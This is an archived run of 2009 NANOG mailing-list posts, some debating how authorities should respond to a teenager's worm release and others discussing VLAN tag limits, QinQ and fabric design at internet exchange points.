All i'm saying is "Cyber Security" needs to be taken as seriously as "real life" security. Hopefully though the 60 day cyber security review by Melissa Hathaway will shake things up. Andrew On Sat, Apr 18, 2009 at 2:49 AM, Chaim Rieger wrote: > And I want cnet to not report this crap. > > They glamorise it. > --Original Message-- > From: andrew.wallace > To: nanog@nanog.org > To: n3td3v > Subject: Re: Michael Mooney releases another worm: Law Enforcement / > Intelligence Agency's do nothing > Sent: Apr 17, 2009 18:38 > > So if Al-Qaeda blow up a shopping centre and the guy who masterminded > it turns out to be 17 he gets a job in MI5? > > OH MY GOD. > > On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates wrote: >> andrew.wallace wrote: >>> >>> I want this individual made an example of and im not joking. >>> >> >> And I'd like an example made of companies that ignore reports of security >> flaws and leave their customers open to such worms; not to mention giving >> the impression to misguided teenagers that the only way they will be heard >> is to release a worm. >> >> Historically, I believe some companies have ignored security concerns until >> someone (sometimes non-maliciously) released a worm. Of course, even >> non-malicious worms can have unpredictable results which result in >> catastrophic behavior. The earliest examples predate my residence on the >> network, but I've read a small bug made them extremely bad. >> >> Jack >> >> > > > > Sent via BlackBerry from T-Mobile
Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
I get it now... Chaim Rieger = netdev Nice trick. -- Steve On Sat, 18 Apr 2009, Chaim Rieger wrote: And I want cnet to not report this crap. They glamorise it. --Original Message-- From: andrew.wallace To: nanog@nanog.org To: n3td3v Subject: Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing Sent: Apr 17, 2009 18:38 So if Al-Qaeda blow up a shopping centre and the guy who masterminded it turns out to be 17 he gets a job in MI5? OH MY GOD. On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates wrote: andrew.wallace wrote: I want this individual made an example of and im not joking. And I'd like an example made of companies that ignore reports of security flaws and leave their customers open to such worms; not to mention giving the impression to misguided teenagers that the only way they will be heard is to release a worm. Historically, I believe some companies have ignored security concerns until someone (sometimes non-maliciously) released a worm. Of course, even non-malicious worms can have unpredictable results which result in catastrophic behavior. The earliest examples predate my residence on the network, but I've read a small bug made them extremely bad. Jack Sent via BlackBerry from T-Mobile
Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
The network community and the security community need to collaborate as much as possible to defeat the threats. I'm British and i'm hoping to make UK as secure as possible. We can only do this by pulling together and reporting intelligence between community's, either if that's on an open list such as Nanog or by invitation only lists run by law enforcement. It doesn't matter as long as both community's are focused on cyber security. Many thanks, Andrew On Sat, Apr 18, 2009 at 3:07 AM, Steve Pirk wrote: > I get it now... Chaim Rieger = netdev > Nice trick. > > -- > Steve > > On Sat, 18 Apr 2009, Chaim Rieger wrote: > >> And I want cnet to not report this crap. >> >> They glamorise it. >> --Original Message-- >> From: andrew.wallace >> To: nanog@nanog.org >> To: n3td3v >> Subject: Re: Michael Mooney releases another worm: Law Enforcement / >> Intelligence Agency's do nothing >> Sent: Apr 17, 2009 18:38 >> >> So if Al-Qaeda blow up a shopping centre and the guy who masterminded >> it turns out to be 17 he gets a job in MI5? >> >> OH MY GOD. >> >> On Sat, Apr 18, 2009 at 2:28 AM, Jack Bates wrote: >>> >>> andrew.wallace wrote: I want this individual made an example of and im not joking. >>> >>> And I'd like an example made of companies that ignore reports of security >>> flaws and leave their customers open to such worms; not to mention giving >>> the impression to misguided teenagers that the only way they will be >>> heard >>> is to release a worm. >>> >>> Historically, I believe some companies have ignored security concerns >>> until >>> someone (sometimes non-maliciously) released a worm. Of course, even >>> non-malicious worms can have unpredictable results which result in >>> catastrophic behavior. The earliest examples predate my residence on the >>> network, but I've read a small bug made them extremely bad. >>> >>> Jack >>> >>> >> >> >> >> Sent via BlackBerry from T-Mobile > >
Re: IXP
Arnold Nipper wrote: On 17.04.2009 20:52 Paul Vixie wrote Large IXP have >300 customers. You would need up to 45k vlan tags, wouldn't you? Not agreeing or disagreeing with this as a concept, but I'd imagine that since a number of vendors support arbitrary vlan rewrite on ports that in simple environment you could do some evil things with that. (ie. you could use QinQ "like" ATM Virtual Paths between core switches and then reuse the VLAN tag as a VC). Then, as long as no peer has more than 4096 peers you're sweet. It'd hurt your head and probably never work, but heck, there's a concept to argue about. (Please note: I don't endorse this as an idea). I guess the other option is to use MPLS xconnect style or, heck, most vendors have gear that'll allow you to do Layer 3 at the same speed as Layer 2, so you could go for routing everyone to a common routing core with either EBGP multihop or MLPA with communities to control route entry and exit. Then broadcast isn't an issue and multicast would kind of be okay. (Please note: I don't endorse this as an idea). None of these options, to be honest, are nice and all more complex than just a Layer2 network with some protocol filtering and rate limiting at the edge. So, it's not clear what more complex arrangements would fix. My feeling is that IXes are just a substitute for PNIs anyway, so peering does naturally migrate that way as the flow get larger. If you're an IX as a business then this may afront you, but more IXes-as-a-business are Colo people (eg. S&D, Equinix) who make good money on xconnects anyway. Or you have a business model that means you accept this happens. Clearly, given the number of 10Gbps ports on some exchanges it's not that much of an issue. MMC
RE: IXP
> Not agreeing or disagreeing with this as a concept, but I'd imagine > that > since a number of vendors support arbitrary vlan rewrite on ports that > in simple environment you could do some evil things with that. (ie. > you could use QinQ "like" ATM Virtual Paths between core switches and > then reuse the VLAN tag as a VC). Then, as long as no peer has more > than 4096 peers you're sweet. It'd hurt your head and probably never > work, but heck, there's a concept to argue about. (Please note: I > don't > endorse this as an idea). > This would be best managed by a very smart, but very simple piece of software. Just like Facebook or LinkedIn, or what-have-you, a network accepts a "peer/friend" request from another network. Once both sides agree (and only as long as both sides agree) the configuration is pinned up. Either side can pull it down. The configs, up to the hardware limits, would be pretty trivial.. Especially QinQ management for VLANID uniqueness. Not sure how switches handle HOL blocking with QinQ traffic across trunks, but hey... what's the fun of running an IXP without testing some limits? Deepak Jain AiNET
Re: IXP
On 18/04/2009, at 12:08 PM, Paul Vixie wrote: i should answer something said earlier: yes there's only 14 bits of tag and yes 2**14 is 4096. in the sparsest and most wasteful allocation scheme, tags would be assigned 7:7 so there'd be a max of 64 peers. it's more likely that tags would be assigned by increment, but it's still nowhere near enough for 300+ peers. however, well before 300 peers, there'd be enough staff and enough money to use something other than a switch in the middle, so that the "tagspace" would be per-port rather than global to the IXP. Q in Q is not how i'd build this... cisco and juniper both have hardware tunnelling capabilities that support this stuff... it just means as the IXP fabric grows it has to become router-based. On Alcatel-Lucent 7x50 gear, VLAN IDs are only relevant to that local port. If you want to build a "VLAN" that operates like it does on a Cisco switch or something, you set up a tag on each port, and join the tags together with a L2 switching service. The tag IDs can be different on each port, or the same... it has no impact. -- Nathan Ward
Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
> So if Al-Qaeda blow up a shopping centre and the guy who masterminded > it turns out to be 17 he gets a job in MI5? what is more fun than a net vigilante? a ranting and raving hyperbolic net vigilante.
Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing
You are exactly right Randy. fromRandy Bush to Franck Martin cc 74attend...@ietf.org dateWed, Mar 18, 2009 at 4:47 PM subject Re: [74attendees] IETF attendee from Italy or Hong Kong -- visa issue > Yes Stockholm is first but as it seemed to be an issue with Asia going > to the USA, Hiroshima is likely the meeting than most Asian will be > able to attend with less visas problems? i am not sure about north koreans, but i am not aware that there would be problems for others. but i am not sure. and in many venues there are also significant problems with various middle-eastern, north african, and gulf countries. this is aside from the israelis keeping the palestinians imprisoned in their own country. On Apr 17, 2009, at 9:56 PM, Randy Bush wrote: So if Al-Qaeda blow up a shopping centre and the guy who masterminded it turns out to be 17 he gets a job in MI5? what is more fun than a net vigilante? a ranting and raving hyperbolic net vigilante.
Re: IXP
> Not sure how switches handle HOL blocking with QinQ traffic across trunks, > but hey... > what's the fun of running an IXP without testing some limits? Indeed. Those with longer memories will remember that I used to regularly apologize at NANOG meetings for the DEC Gigaswitch/FDDI head-of-line blocking that all Gigaswitch-based IXPs experienced when some critical mass of OC3 backbone circuits was reached and the 100 MB/s fabric rolled over and died, offered here (again) as a cautionary tale for those who want to test those particular limits (again). At PAIX, when we "upgraded" to the Gigaswitch/FDDI (from a DELNI; we loved the DELNI), I actually used a feature of the switch that you could "black out" certain sections of the crossbar to prevent packets arriving on one port from exiting certain others at the request of some networks to align L2 connectivity with their peering agreements. It was fortunate that the scaling meltdown occurred when it did, otherwise I would have spent more software development resources trying to turn that capability into something that was operationally sustainable for networks to configure the visibility of their port to only those networks with which they had peering agreements. That software would probably have been thrown away with the Gigaswitches had it actually been developed, and rewritten to use something horrendous like MAC-based filtering, and if I recall correctly the options didn't look feasible at the time - and who wants to have to talk to a portal when doing a 2am emergency replacement of a linecard to change registered MAC addresses, anyway?. The port-based stuff had a chance of being operationally feasible. The notion of a partial pseudo-wire mesh, with a self-service portal to request/accept connections like the MAEs had for their ATM-based fabrics, follows pretty well from that and everything that's been learned by anyone about advancing the state of the art, and extends well to allow an IXP to have a distributed fabric benefit from scalable L2.5/L3 traffic management features while looking as much like wires to the networks using the IXP. If the gear currently deployed in IXP interconnection fabrics actually supports the necessary features, maybe someone will be brave enough to commit the software development resources necessary to try to make it an operational reality. If it requires capital investment, though, I suspect it'll be a while. The real lesson from the last fifteen or so years, though, is that bear skins and stone knives clearly have a long operational lifetime. Stephen
Re: IXP
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Elmar K. Bins wrote: > I am not an IXP operator, but I know of no exchange (public or > private, big or closet-style) that uses private ASNs or RFC1918 > space. I know of at least two IXPs where RFC 1918 space is used on the IXP Subnet. I know a fair number of IXPs where providers use Private ASNs even for longish durations. I also know of a lot of IXPs where IPv4 prefixes longer then /24s are visible. But, as others have said, in most cases these measures are temporary in nature and eventually everyone will migrate. thanks -gaurab -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAknpajwACgkQSo7fU26F3X1/KgCg8P6or9LD7kldigNW38OhJ5eF r9wAnRtbbGel2JZVFRJ0xqLbcxWUeBUQ =dVae -END PGP SIGNATURE-
RE: Michael Mooney releases another worm: Law Enforcement /Intelligence Agency's do nothing
Pardon the ignorance I have to take this a step back. Your neighbor leaves their window open with a fresh bowl of fish near the window. A bunch of cats show up and start trying to get in, to no avail do they get in. At the first chance you discuss this with your neighbor, and warn them of this situation. The following day the neighbor does the same thing, window open, fresh bowl of fish, do you A: sit back and say "Told you so". B: Swat the cats away and guard the window. C: kill all the cats in the area. D: hire the cats to find another open window. I know this sounds silly, but to simplify things, If you A: Sitting back and watching the whole mess your now an accessory (Yeah I watched em) B: Neighbor says "Hey I wanted to take pictures of those cats and you shoed them away!" C: Vigilante style kill all the cats. Closing a window just is too much. D: Hire cats? Perhaps another EDS commercial. If theres a genuine exploit that one has been made aware of, and there is no preventive action made than I think we all know the outcome. If theres a sudden exploit that runs ramped that you haven't been aware of than lots of time spent researching it. Locking up all the "bad guys" will not solve the short comings of security in applications. But just my 2¢s - Joe Blanchard > -Original Message- > From: Randy Bush [mailto:ra...@psg.com] > Sent: Saturday, April 18, 2009 12:56 AM > To: andrew.wallace > Cc: n3td3v; nanog@nanog.org > Subject: Re: Michael Mooney releases another worm: Law > Enforcement /Intelligence Agency's do nothing > > > So if Al-Qaeda blow up a shopping centre and the guy who > masterminded > > it turns out to be 17 he gets a job in MI5? > > what is more fun than a net vigilante? a ranting and raving > hyperbolic net vigilante. >
